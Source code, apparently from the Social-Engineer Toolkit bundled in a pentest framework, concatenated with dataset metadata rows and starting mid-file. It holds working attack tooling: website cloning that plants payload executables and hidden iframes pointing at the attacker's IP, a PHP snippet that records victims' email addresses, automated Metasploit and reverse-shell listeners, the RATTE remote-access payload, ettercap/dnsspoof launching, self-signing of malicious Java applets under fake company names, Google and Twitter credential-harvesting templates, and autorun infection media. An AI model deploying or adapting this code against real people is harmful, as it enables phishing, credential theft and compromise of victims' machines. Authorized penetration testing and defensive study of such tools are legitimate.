fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line = line.split("=")
template = line[1]
# grab web attack selection
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector", "r").readlines()
for line in fileopen:
attack_vector = line.rstrip()
# if it doesn't exist just set a default template
if not os.path.isfile(userconfigpath + "attack_vector"):
attack_vector = "nada"
# Sticking it to A/V below
import string
import random
def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(userconfigpath + "multi_harvester"):
multiattack_harv = "on"
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multiattack_harv = "on"
# open our config file that was specified in SET
if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(userconfigpath + "site.template", "r").readlines()
# start loop here
for line in fileopen:
line = line.rstrip()
# look for config file and parse for URL
match = re.search("URL=", line)
if match:
line = line.split("=")
# define url to clone here
url = line[1].rstrip()
# if we didn't create template then do self
if not os.path.isfile(userconfigpath + "site.template"):
template = "SELF"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
fileopen = open("index.template", "r").readlines()
filewrite = open("index.html", "w")
if attack_vector == "java":
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
filewrite.close()
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
counter = 0
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace(
"<head>", '<head><iframe src ="http://%s:8080/" width="100" height="100" scrolling="no"></iframe>' % (ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>", '<head><iframe src = "http://%s:80/" width="100" height="100" scrolling="no" ></iframe>' % (ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
filewrite.close()
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid':
if attack_vector != 'hijacking':
print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(userconfigpath + "" + applet_name):
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath), "%s/%s" % (userconfigpath, applet_name))
shutil.copyfile(userconfigpath + "%s" % (applet_name),
"%s/web_clone/%s" % (userconfigpath, applet_name))
if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
nix = check_options("NIX.BIN=")
shutil.copyfile("%s/src/html/nix.bin" %
(definepath), "%s/web_clone/%s" % (userconfigpath, nix))
if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
mac = check_options("MAC.BIN=")
shutil.copyfile("%s/src/html/mac.bin" % (definepath),
"%s/web_clone/%s" % (userconfigpath, definepath, mac))
if os.path.isfile(userconfigpath + "msf.exe"):
win = check_options("MSF.EXE=")
shutil.copyfile(userconfigpath + "msf.exe",
"%s/web_clone/%s" % (userconfigpath, win))
# pull random name generation
print_status("The site has been moved. SET Web Server is now listening..")
rand_gen = check_options("MSF_EXE=")
if rand_gen != 0:
if os.path.isfile(userconfigpath + "custom.exe"):
shutil.copyfile(userconfigpath + "msf.exe",
userconfigpath + "web_clone/msf.exe")
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(userconfigpath + "web_clone/msf.exe",
userconfigpath + "web_clone/%s" % (rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(userconfigpath + "docbase.file"):
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
</FRAMESET>
</HTML>""" % (ipaddr))
if os.path.isfile(userconfigpath + "web_clone/site.html"):
os.remove(userconfigpath + "web_clone/site.html")
shutil.copyfile(userconfigpath + "web_clone/index.html",
userconfigpath + "web_clone/site.html")
filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(docbase)
filewrite.close()
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if apache == 0:
if multiattack_harv == 'off':
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the applet
# attack
path = (userconfigpath + "web_clone/")
try:
import multiprocessing
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except KeyboardInterrupt:
p.stop()
except Exception as e:
import thread
thread.start_new_thread(webserver.start_server, (web_port, path))
if apache == 0:
if os.path.isfile(userconfigpath + "meta_config"):
msf_path = meta_path()
#print("You will need to launch the listener on your own, execute in a different shell the following command if using Metasploit:")
child = pexpect.spawn("%smsfconsole -r %s/meta_config" % (msf_path, userconfigpath))
child.interact()
pause=raw_input("Press <return> when you want to shut down the web server. It is currently listening.")
# Handle KeyboardInterrupt
except KeyboardInterrupt:
exit_set()
# Handle Exceptions
except Exception as e:
print(e)
log(e)
print(bcolors.RED + "[!] ERROR: You probably have something running on port 80 already, Apache??")
print("[!] There was an issue, printing error: " + str(e) + bcolors.ENDC)
print(bcolors.ENDC + "Do you want to try to stop Apache? y/n")
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
subprocess.Popen("/etc/init.d/nginx stop", shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = (userconfigpath + "web_clone/")
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except Exception:
print(bcolors.RED + "[!] UNABLE TO STOP APACHE! Exiting..." + bcolors.ENDC)
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = check_options("CUSTOM_EXE=")
if custom_exe != 0:
while 1:
# try block inside of loop, if control-c detected, then
# exit
try:
print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
pause = input(
bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC)
# handle keyboard interrupt
except KeyboardInterrupt:
print(bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC)
try: p.stop()
except: pass
break
if apache == 1:
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" %
(definepath, apache_path, definepath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path), shell=True).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
filewrite = open("%s/harvester_%s.txt" % (apache_path, now), "w")
filewrite.write("")
filewrite.close()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" %
(apache_path, now), shell=True).wait()
# here we specify if we are tracking users and such
fileopen = open("%s/index.html" % (apache_path), "r")
data = fileopen.read()
data = data.replace(
"<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>\n/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */""" % (now))
filewrite = open("%s/index.php" % (apache_path), "w")
filewrite.write(data)
filewrite.close()
print_status("All files have been copied to %s" % (apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = meta_path()
# define if use apache or not
apache = 0
# open set_config here
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = check_config("APACHE_DIRECTORY=")
apache = 1
if operating_system == "windows":
apache = 0
web_server = check_config("WEB_PORT=")
# setup multi attack options here
multiattack = "off"
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multiattack = "on"
if os.path.isfile(userconfigpath + "multi_harvester"):
multiattack = "on"
# Grab custom or set defined
template = ""
if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line = line.split("=")
template = line[1]
# Test to see if something is running on port 80, if so throw error
try:
web_port = check_config("WEB_PORT=")
web_port = int(web_port)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', web_port))
ipaddr.settimeout(2)
if ipaddr:
# if apache isnt running and something is on 80, throw error
if apache == 0:
print_error(
"ERROR:Something is running on port %s. Attempting to see if we can stop Apache..." % (web_port))
# if we are running windows then flag error (probably IIS or tomcat
# or something like that)
if operating_system == "nt":
exit_set()
# if we are running posix then check to see what the process is
# first
if operating_system == "posix":
# if we detect an apache installation
if os.path.isfile("/etc/init.d/apache2"):
apache_stop = input(
"[!] Apache may be running, do you want SET to stop the process? [y/n]: ")
if apache_stop.lower() == "y" or apache_stop.lower() == "yes":
print_status(
"Attempting to stop apache.. One moment..")
# stop apache here
subprocess.Popen(
"/etc/init.d/apache2 stop", shell=True).wait()
try:
ipaddr.connect(('localhost', web_port))
if ipaddr:
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error(
"Exit whatever is listening and restart SET")
exit_set()
# if it couldn't connect to localhost, we are good to
# go and continue forward
except Exception:
print_status(
"Success! Apache was stopped. Moving forward within SET...")
# if we don't want to stop apache then exit SET and flag
# user
if apache_stop.lower() == "n" or apache_stop.lower() == "no":
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config and turn apache on")
print_error(
"Exit whatever is lsitening or turn Apache on in set_config and restart SET")
exit_set()
else:
print_warning(
"If you want to use Apache, edit the /etc/setoolkit/set.config")
print_error("Exit whatever is listening and restart SET")
exit_set()
# if apache is set to run let the user know we are good to go
if operating_system == "posix":
if apache == 1:
try:
web_port = check_config("WEB_PORT=")
web_port = int(web_port)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', web_port))
ipaddr.settimeout(2)
if ipaddr:
print_status(
"Apache appears to be running, moving files into Apache's home")
except:
print_error("Exit whatever is listening and restart SET")
exit_set()
# except all issues and throw out to here
except Exception as e:
# if we are using apache
if apache == 1:
print_error("Error:Apache does not appear to be running.")
print_error("Start it or turn APACHE off in /etc/setoolkit/set.config")
print_status("Attempting to start Apache manually...")
apache_counter = 0
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd start", shell=True).wait()
apache_counter = 1
if apache_counter == 0:
print_error("ERROR: Unable to start Apache through SET,")
print_error(
"ERROR: Please turn Apache off in the set_config or turn it on manually!")
print_error("Exiting the Social-Engineer Toolkit...")
exit_set()
# except KeyboardInterrupt
except KeyboardInterrupt:
print_warning("KeyboardInterrupt detected, bombing out to the prior menu.")
# grab metasploit root directory
if operating_system == "posix":
msf_path = meta_path()
# Launch SET web attack and MSF Listener
try:
if multiattack == "off":
print((bcolors.BLUE + "\n***************************************************"))
print((bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack."))
print((bcolors.BLUE + "***************************************************"))
print((bcolors.PURPLE +
"\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC))
if apache == 1:
print((bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC))
if os.path.isfile(userconfigpath + "meta_config"):
fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
if apache == 1:
print_warning("Apache appears to be configured in the SET (set_config)")
print_warning("You will need to disable Apache and re-run SET since Metasploit requires port 80 for WebDav")
exit_set()
print(bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""")
web_server_start()
# if we are using ettercap
if os.path.isfile(userconfigpath + "ettercap"):
fileopen5 = open(userconfigpath + "ettercap", "r")
for line in fileopen5:
ettercap = line.rstrip()
# run in background
ettercap = ettercap + " &"
# spawn ettercap or dsniff
subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# if metasploit config is in directory
if os.path.isfile(userconfigpath + "meta_config"):
if ("CUSTOM" not in template) or ("SELF" not in template):
print_info("Launching MSF Listener...")
print_info("This may take a few to load MSF...")
# this checks to see if we want to start a listener
automatic_listener = check_config("AUTOMATIC_LISTENER=").lower()
if automatic_listener != "off":
try:
module_reload(pexpect)
except:
import pexpect
# specify if we are using the multi pyinjector
meta_config = "meta_config"
if os.path.isfile(userconfigpath + "meta_config_multipyinjector"):
meta_config = "meta_config_multipyinjector"
# if we arent using a custom payload
if custom != 1:
child1 = pexpect.spawn("%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, userconfigpath, meta_config))
# check if we want to deliver emails or track users that click the
# link
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
if webattack_email == "on" or track_email == "on":
try:
module_reload(src.phishing.smtp.client.smtp_web)
except:
import src.phishing.smtp.client.smtp_web
# if we arent using a custom payload
if custom != 1:
child1.interact()
if os.path.isfile(userconfigpath + "set.payload"):
port = check_options("PORT=")
# grab configuration
fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen:
set_payload = line.rstrip()
if set_payload == "SETSHELL":
print("\n")
print_info("Launching the SET Interactive Shell...")
try:
module_reload(src.payloads.set_payloads.listener)
except:
import src.payloads.set_payloads.listener
if set_payload == "SETSHELL_HTTP":
print("\n")
print_info("Launching the SET HTTP Reverse Shell Listener...")
try:
module_reload(src.payloads.set_payloads.set_http_server)
except:
import src.payloads.set_payloads.set_http_server
if set_payload == "RATTE":
print_info(
"Launching the Remote Administration Tool Tommy Edition (RATTE) Payload...")
# prep ratte if its posix
if operating_system == "posix":
subprocess.Popen("chmod +x src/payloads/ratte/ratteserver",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
os.system("src/payloads/ratte/ratteserver %s" % (port))
# if not then run it in windows
if operating_system == "windows":
if not os.path.isfile(userconfigpath + "ratteserver.exe"):
shutil.copyfile(
"../../payloads/ratte/ratteserver.binary", userconfigpath + "ratteserver.exe")
shutil.copyfile(
"../../payloads/ratte/cygwin1.dll", userconfigpath + "cygwin1.dll")
os.system(userconfigpath + "ratteserver %s" % (definepath, port))
# handle errors
except Exception as e:
log(e)
pass
try:
if apache == 1:
input(bcolors.ENDC + "\nPress [return] when finished.")
child.close()
child1.close()
# close ettercap thread, need to launch from here eventually instead of executing
# an underlying system command.
if operating_system == "posix":
subprocess.Popen(
"pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait()
# kill dnsspoof if there
subprocess.Popen(
"pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait()
if apache == 1:
subprocess.Popen("rm %s/index.html 1> /dev/null 2> /dev/null;rm %s/Signed* 1> /dev/null 2> /dev/null;rm %s/*.exe 1> /dev/null 2> /dev/null" %
(apache_path, apache_path, apache_path), shell=True).wait()
except:
try:
child.close()
except:
pass
except KeyboardInterrupt:
sys.exit(1)
# if we turned automatic listener off
if automatic_listener == "off" or multiattack == "on":
if automatic_listener == "off":
print_warning("Listener is turned off in /etc/setoolkit/set.config!")
if automatic_listener == "off" or template == "CUSTOM" or template == "SELF":
while 1:
try:
print_warning(
"\n If you used custom imports, ensure you create YOUR OWN LISTENER!\nSET does not know what custom payload you used.")
pause = input(
"\nPress {control -c} to return to the main menu when you are finished.")
except KeyboardInterrupt:
break
if apache == 1:
# if we are running apache then prompt to exit this menu
print_status(
"Everything has been moved over to Apache and is ready to go.")
return_continue()
# we stop the python web server when we are all finished
if apache == 0:
# specify the web port
web_port = check_config("WEB_PORT=")
# stop the web server
try:
import src.core.webserver as webserver
except:
module_reload(src.core.webserver)
webserver.stop_server(web_port)
# call the cleanup routine
cleanup = check_config("CLEANUP_ENABLED_DEBUG=")
if cleanup.lower() != "on":
cleanup_routine()
| 30,446 | Python | .py | 617 | 36.606159 | 443 | 0.550632 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,829 | fasttrack_http_server.py | CHEGEBB_africana-framework/externals/set/src/html/fasttrack_http_server.py | #!/usr/bin/env python3
# coding=utf-8
import os
import sys
definepath = os.getcwd()
sys.path.append(definepath)
import src.core.setcore as core
core.start_web_server_unthreaded(os.path.join(core.userconfigpath, "web_clone"))
| 227 | Python | .py | 8 | 27.125 | 80 | 0.801843 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,830 | web_start.py | CHEGEBB_africana-framework/externals/set/src/html/web_start.py | #!/usr/bin/env python3
# coding=utf-8
# This is just a simple import for web_start
import sys
import src.core.setcore as core
core.debug_msg(core.mod_name(), "importing 'src.html.spawn'", 1)
sys.path.append("src/html")
try:
import src.html.spawn
except:
pass
| 269 | Python | .py | 11 | 22.545455 | 64 | 0.746094 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,831 | self_sign.py | CHEGEBB_africana-framework/externals/set/src/html/unsigned/self_sign.py | #!/usr/bin/env python3
# coding=utf-8
import os
import subprocess
import src.core.setcore as core
#########################
# Simple signer for signing the java applet attack
#########################
# create Key: keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
# sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass
# mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet
os.chdir("src/html/unsigned")
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
""")
core.print_error("*** WARNING ***")
core.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
core.print_error("*** WARNING ***")
# random string used to generate signature of java applet
random_string = core.generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias {0} "
"-keystore mykeystore "
"-keypass mykeypass "
"-storepass mystorepass".format(random_string), shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore "
"-storepass mystorepass "
"-keypass mykeypass "
"-signedjar Signed_Update.jar unsigned.jar {0}".format(random_string), shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar {0}".format(core.userconfigpath), shell=True)
# move back to original directory
os.chdir("../../../")
core.print_status("Java Applet is now signed and will be imported into the website")
| 1,850 | Python | .py | 43 | 39.162791 | 127 | 0.712375 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,832 | verified_sign.py | CHEGEBB_africana-framework/externals/set/src/html/unsigned/verified_sign.py | #!/usr/bin/env python3
# coding=utf-8
import os
import shutil
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# keytool -import -storepass pw -alias MyCert -file mycert.spc
# jarsigner -verbose -storepass <pw> -keypass <pw> unsigned.jar MyCert
###########################################################
# #
# SET - Use codesigning for the java applet attack vector #
# #
###########################################################
# based on the new update to Java, this no longer works and just shows a big "UNKNOWN".
# to get around that you can purchase your own digital certificate through
# verisign/thawte
# grab current path
definepath = core.definepath()
# print warning message that we need to install sun-java or openjdk
print("""
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
make this work. This menu will automate the portions for you to either create the request to submit to the
certificate authority or allow you to import a code signing certificate that you may already have.
Note that purchasing a code signing certificate is somewhat difficult. It requires you to have a business name and
prove the legitimacy of that certificate. That means you have to register a business with the state and everything else.
Good news is, the process to do that is extremely simple. All in all, it should cost roughly around $300-350 to setup your
business, buy a code signing certificate, and publish an applet to be whatever you want. You can also do a "DBA" or doing
business as which is also much easier to use.
""")
core.print_error("*** WARNING ***")
core.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
core.print_error("*** WARNING ***")
# use flag is in case someone already has a code signing certificate, in
# that case it bypasses the "no" answer
use_flag = 0
print("""
[--------------------------------]
Initial Selection Process
[--------------------------------]
There are a few choice here, the first is do you want to import your own Java Applet that you've already signed. If you already have the certificate and want to use the SET applet, you can find an unsigned version under src/html/unsigned/unsigned.jar. If you want to use this menu, you can as well.
Option 1 will import your own SIGNED applet that you already have.
Option 2 will go through the process of either creating the code signing certificate to be submitted to the CA or allow you to import your own certificate. If you already have your certificate and want to have SET handle the signing, this is the option you want.
1. Import your own java applet into SET (needs to be SIGNED).
2. Either create a code-signing csr or use a code-signing certificate you already own.
""")
firstprompt = input("Enter your choice [1-2]: ")
if not firstprompt:
firstprompt = "2"
# if we want to import our own java applet
if firstprompt == "1":
newpath = input("Enter the path to the .jar file: ")
if not os.path.isfile(newpath):
while True:
core.print_error("Unable to locate the file. Please try again.")
newpath = input("Enter the path to the .jar file: ")
if os.path.isfile(newpath):
break
# import into SET
core.print_status("Importing the applet into SET for weaponization...")
shutil.copyfile(newpath, os.path.join(core.userconfigpath, "Signed_Update.jar.orig"))
shutil.copyfile(newpath, os.path.join(core.userconfigpath, "Signed_Update.jar"))
core.print_status("The applet has been successfully imported into SET.")
# if we want to either generate a certificate or use our own certificate
# this is it
if firstprompt == "2":
cert_path = ""
# prompt for a different certificate
prompt = input(core.setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
# if we selected yes if we generated a code signing certificate
if prompt == "yes" or prompt == "y":
# prompt the user to import the code signing certificate
cert_path = input(core.setprompt("0", "Path to the code signing certificate file (provided by CA)"))
if not os.path.isfile(cert_path):
# loop forever
while True:
core.print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path = input(core.setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path):
break
# here is where we import the certificate
try:
core.print_info("Importing the certificate into SET...")
subprocess.Popen("keytool -import -alias MyCert -file {}".format(cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the
# request process below
use_flag = 1
# exception here in case it was already imported before
except:
pass
# this will exit the menu
if prompt == "quit" or prompt == "q":
use_flag = 0
prompt = "yes"
cert_path = ""
# if we have a cert now or if we need to generate one
if use_flag == 1 or prompt == "no" or prompt == "n":
# if we selected no we need to create one
if prompt == "no" or prompt == "n":
# get the stuff ready to do it
core.print_info("Generating the initial request for Verisign...")
# grab input from user, fqdn
answer1 = input(core.setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
# grab name of organizaton
answer2 = input(core.setprompt("0", "Name of the organization"))
# grab two letter country code
answer3 = input(core.setprompt("0", "Two letter country code (ex. US)"))
# if blank, default to US
if not answer3:
answer3 = "US"
# grab state
answer4 = input(core.setprompt("0", "State"))
# grab city
answer5 = input(core.setprompt("0", "City"))
# generate the request crl
subprocess.Popen('keytool '
'-genkey '
'-alias MyCert '
'-keyalg RSA '
'-keysize 2048 '
'-dname "CN={a1},O={a2},C={a3},ST={a4},L={a5}"'.format(a1=answer1,
a2=answer2,
a3=answer3,
a4=answer4,
a5=answer5),
shell=True).wait()
core.print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > {}".format(os.path.join(definepath, "certreq.txt")), shell=True).wait()
core.print_status("Export successful. Exported certificate under the SET root under certreq.txt")
core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
core.print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
cert_path = input(core.setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while True:
core.print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = input(core.setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path):
break
# import the certificate
subprocess.Popen("keytool -import -alias MyCert -file {0}".format(cert_path), shell=True).wait()
# if our certificate is in the data store
if os.path.isfile(cert_path):
# sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar {0} MyCert".format(os.path.join(definepath, "src/html/unsigned/unsigned.jar")), shell=True).wait()
# move it into our html directory
subprocess.Popen("mv Signed_Update.jar {0}".format(os.path.join(core.userconfigpath, "Signed_Update.jar.orig")), shell=True).wait()
# move back to original directory
core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")
| 9,574 | Python | .py | 162 | 48.623457 | 298 | 0.618819 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,833 | template.py | CHEGEBB_africana-framework/externals/set/src/html/templates/template.py | #! /usr/bin/python3
# coding=utf-8
import os
import shutil
from src.core.setcore import *
# Py2/3 compatibility
# Python3 renamed raw_input to input
try: input = raw_input
except NameError: pass
dest = ("src/html/")
url = ("")
debug_msg(mod_name(), "entering src.html.templates.template'", 1)
#
# used for pre-defined templates
#
print("""
--------------------------------------------------------
**** Important Information ****
For templates, when a POST is initiated to harvest
credentials, you will need a site for it to redirect.
You can configure this option under:
/etc/setoolkit/set.config
Edit this file, and change HARVESTER_REDIRECT and
HARVESTER_URL to the sites you want to redirect to
after it is posted. If you do not set these, then
it will not redirect properly. This only goes for
templates.
--------------------------------------------------------""")
print("""
1. Java Required
2. Google
3. Twitter
""")
choice = raw_input(setprompt(["2"], "Select a template"))
if choice == "exit":
exit_set()
# file used for nextpage in java applet attack
# if nothing is selected
if choice == "":
choice = "1"
# if java required
if choice == "1":
if os.path.isfile("src/html/index.template"):
os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
url = ""
# if google
if choice == "2":
if os.path.isfile("src/html/index.template"):
os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/google/index.template", "src/html/index.template")
url = "http://www.google.com"
# if twitter
if choice == "3":
if os.path.isfile("src/html/index.template"):
os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/twitter/index.template", "src/html/index.template")
url = "http://www.twitter.com"
if not os.path.isdir(os.path.join(userconfigpath, "web_clone")):
os.makedirs(os.path.join(userconfigpath, "web_clone/"))
if os.path.isfile(os.path.join(userconfigpath, "web_clone/index.html")):
os.remove(os.path.join(userconfigpath, "web_clone/index.html"))
shutil.copyfile("src/html/index.template", os.path.join(userconfigpath, "web_clone/index.html"))
with open(os.path.join(userconfigpath, "site.template"), 'w') as filewrite:
filewrite.write("TEMPLATE=SELF\nURL={0}".format(url))
debug_msg(mod_name(), "exiting src.html.templates.template'", 1)
| 2,467 | Python | .py | 66 | 34.484848 | 96 | 0.684166 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,834 | autolaunch.py | CHEGEBB_africana-framework/externals/set/src/autorun/autolaunch.py | #!/usr/bin/env python3
# coding=utf-8
# simple autorun creation for set
import os
import subprocess
from time import sleep
import src.core.setcore as core
# define metasploit path
definepath = os.getcwd()
msf_path = core.meta_path()
me = core.mod_name()
autorun_path = os.path.join(core.userconfigpath, "autorun")
trigger = 0
if core.check_options("INFECTION_MEDIA=") == "ON":
trigger = 1
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.userconfigpath, "payload.exe"),
os.path.join(autorun_path, "program.exe")),
shell=True).wait()
if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")):
trigger = 2
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path,
os.path.join(core.userconfigpath, "template.pdf")),
shell=True).wait()
if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")):
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.userconfigpath, "dll/*")),
shell=True).wait()
